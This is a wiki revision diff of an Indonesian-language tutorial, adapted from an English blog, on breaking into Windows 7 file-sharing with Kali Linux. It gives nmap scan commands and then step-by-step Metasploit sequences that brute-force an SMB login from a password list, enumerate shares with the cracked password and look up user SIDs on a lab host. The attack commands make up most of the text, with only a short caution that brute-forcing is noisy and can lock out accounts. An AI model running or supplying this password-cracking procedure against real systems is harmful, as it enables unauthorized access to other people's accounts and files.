Difference between revisions of "Kali Linux: Membobol File Sharing Password di Windows 7"

From OnnoWiki
Jump to navigation Jump to search
Line 11: Line 11:
 
  nmap -sS  -A -O  192.168.0.0/24
 
  nmap -sS  -A -O  192.168.0.0/24
 
  nmap -sS  -A -O  192.168.0.7,90
 
  nmap -sS  -A -O  192.168.0.7,90
 
 
 
 
 
 
Screenshot from 2014-06-24 03:32:42
 
 
 
 
 
 
 
 
 
 
Nmap results shows that the target machine had smb with user level authentication. its clearly show we can authenticate smb with username and password.
 
 
 
 
 
 
 
 
 
 
 
 
Next we going to use metasploit framework to  brute-login against the smb of target machine. so we going to use smb_login module in msfconsole.
 
 
 
 
 
 
 
 
 
 
 
 
Metasploit’s smb_login module will attempt to login via SMB across a provided range of IP addresses.
 
 
 
 
 
 
 
 
 
 
#msfconsole
 
 
 
 
 
 
 
 
#msf > use auxiliary/scanner/smb/smb_login
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > show options
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > set RHOSTS 192.168.31.2
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > set SMBUser sathish
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > set PASS_FILE  ‘/home/sathish/password’
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > set THREADS 10
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > run
 
 
 
 
 
 
 
 
Above I used SMBUser has sathish because, My target machines computer name is sathish-PC so there is more chance of having an account with name the sathish and the password is brute-forced using a password file containing word lists in my home directory.
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:28:53
 
 
 
 
 
 
 
 
 
 
Keep in mind, this is very “loud” as it will show up as a failed login attempt in the event logs of  Windows box it touches. Be thoughtful on the network you are taking this action on.
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:29:29
 
 
 
 
 
 
 
 
After getting successful brute-force login, we need to  enumerates for SMB shares on the target machine with the known set of user credential.
 
 
 
 
 
 
 
 
 
 
The smb_enumshares module, as would be expected, enumerates any SMB shares that are available on a remote system.
 
 
 
 
 
 
 
 
#msf > use auxiliary/scanner/smb/smb_enumshares
 
 
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > show options
 
 
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > set RHOSTS 192.168.31.2
 
 
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > set SMBUser sathish
 
 
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > set SMBPass bhuvi
 
 
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > set THREADS 10
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > run
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:31:34
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:32:26
 
 
 
 
 
 
 
 
 
 
It will list the SMB share on the target machine and now we need more details about the target  for the SID of users and groups.
 
 
 
 
 
 
 
 
The smb_lookupsid module brute-forces SID lookups on a range of targets to determine what local users exist the system. Knowing what users exist on a system can help to login.
 
 
 
 
 
 
 
 
#msf > use auxiliary/scanner/smb/smb_lookupsid
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > show options
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > set RHOSTS 192.168.31.2
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > set SMBPass bhuvi
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > set SMBUser sathish
 
 
 
 
 
  
 
   
 
   
 +
==Hack Password==
  
#msf auxiliary(smb_lookupsid) > run
+
Menggunakan cara bruteforce untuk hack password.
 
+
Cara ini cukup "ribut" karena semua kegiatan kita akan dicatat / di log oleh server, sehingga akan ketahuan.
 
   
 
   
  
   
+
  msfconsole thankyou
 +
use auxiliary/scanner/smb/smb_login
 +
show options
 +
set RHOSTS 192.168.31.2
 +
set SMBUser sathish
 +
set PASS_FILE  ‘/home/sathish/password’
 +
set THREADS 10
 +
run
  
 
   
 
   
  
Screenshot from 2014-06-24 13:34:11
 
  
   
+
  use auxiliary/scanner/smb/smb_enumshares
 +
show options
 +
set RHOSTS 192.168.31.2
 +
set SMBUser sathish
 +
set SMBPass bhuvi
 +
set THREADS 10
 +
run
  
 
  
Screenshot from 2014-06-24 13:37:28
+
use auxiliary/scanner/smb/smb_lookupsid
 
+
  show options
   
+
  set RHOSTS 192.168.31.2
 
+
  set SMBPass bhuvi
   
+
  set SMBUser sathish
 
+
  run
It will list the users and groups on the target machine with SID numbers, its help us to think more about the target system and from known user credential we going to mount the windows share on our attacking computer.
 
 
 
 
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 14:08:07
 
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 19:44:03
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 14:11:08
 
 
 
 
 
 
Screenshot from 2014-06-24 19:41:43
 
 
 
 
 
 
 
 
 
[Note]
 
 
 
 
 
 
 
 
 
 
 
 
A brute force attack or an aggressive password guessing attack is very noisy and will likely lock out user accounts depending on how the group policies for that domain have been configured.
 
 
 
   
 
 
 
   
 
 
 
   
 
  
So brute forcing windows accounts isn’t generally a very good idea due to lockout settings and the possibility of creating a Denial of Service condition. Most windows networks have group policies that enforce a lockout of X minutes after Y failed attempts. As such, brute force attacks are pretty much too risky.
 
  
 
==Referensi==
 
==Referensi==
  
 
* https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/
 
* https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/

Revision as of 07:48, 11 February 2016

Sumber: https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/



Scan Jaringan

Contoh

nmap -sS  -A -O  192.168.0.7
nmap -sS  -A -O  192.168.0.0/24
nmap -sS  -A -O  192.168.0.7,90


Hack Password

Menggunakan cara bruteforce untuk hack password. Cara ini cukup "ribut" karena semua kegiatan kita akan dicatat / di log oleh server, sehingga akan ketahuan.


msfconsole thankyou
use auxiliary/scanner/smb/smb_login
show options
set RHOSTS 192.168.31.2
set SMBUser sathish
set PASS_FILE  ‘/home/sathish/password’
set THREADS 10
run



use auxiliary/scanner/smb/smb_enumshares
show options
set RHOSTS 192.168.31.2
set SMBUser sathish
set SMBPass bhuvi
set THREADS 10
run


use auxiliary/scanner/smb/smb_lookupsid
show options
set RHOSTS 192.168.31.2
set SMBPass bhuvi
set SMBUser sathish
run


Referensi